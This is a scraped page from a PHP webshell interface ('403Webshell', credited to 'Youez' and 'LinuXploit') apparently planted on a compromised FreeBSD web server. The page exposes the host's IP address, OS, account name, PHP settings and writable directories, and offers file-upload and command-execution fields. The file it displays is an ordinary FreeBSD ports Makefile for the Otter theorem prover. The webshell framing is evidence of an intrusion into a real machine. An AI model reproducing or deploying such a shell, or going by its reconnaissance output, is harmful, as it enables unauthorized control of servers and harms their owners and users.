403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/misc/otter/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/misc/otter/Makefile
PORTNAME=	otter
PORTVERSION=	3.3f
PORTREVISION=	4
CATEGORIES=	misc
MASTER_SITES=	http://www-unix.mcs.anl.gov/AR/otter/dist33/

MAINTAINER=	wollman@FreeBSD.org
COMMENT=	Theorem prover and finite model searcher
WWW=		https://www-unix.mcs.anl.gov/AR/otter/

LICENSE=	PD
LICENSE_FILE=	${WRKSRC}/Legal

USES=		shebangfix
SHEBANG_FILES=	examples-mace2/Perl-examples/commute4_filter

MAKE_ARGS=	CC="${CC}" CFLAGS="${CFLAGS}"

PROGRAMS=	anldp mace2 otter
PORTDOCS=	README anldp.pdf mace2.pdf otter33.pdf

OPTIONS_DEFINE=	DOCS EXAMPLES

MAKE_JOBS_UNSAFE=	yes

post-patch:
# Change "cd foo && $(MAKE)" into "$(MAKE) -C foo"
	@${REINPLACE_CMD} -E 's,cd (.+) && (\$$\(MAKE\)),\2 -C \1, ; \
		s,CC=gcc,,' ${WRKSRC}/Makefile
# Add missing depedencies for install targets
	@${REINPLACE_CMD} -e 's,^install:,& otter,' \
		${WRKSRC}/source/Makefile
	@${REINPLACE_CMD} -e 's,^install:,& mace2 anldp,' \
		${WRKSRC}/mace2/Makefile

do-install:
	${INSTALL_PROGRAM} ${PROGRAMS:S,^,${WRKSRC}/bin/,} ${STAGEDIR}${PREFIX}/bin

do-install-DOCS-on:
	@${MKDIR} ${STAGEDIR}${DOCSDIR}
	${INSTALL_DATA} ${PORTDOCS:S,^,${WRKSRC}/documents/,} ${STAGEDIR}${DOCSDIR}

do-install-EXAMPLES-on:
	@${MKDIR} ${STAGEDIR}${EXAMPLESDIR} ${STAGEDIR}${PREFIX}/share/examples/mace2
	(cd ${WRKSRC}/examples; ${PAX} -rw . ${STAGEDIR}${EXAMPLESDIR})
	(cd ${WRKSRC}/examples-mace2; ${PAX} -rw . ${STAGEDIR}${PREFIX}/share/examples/mace2)

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit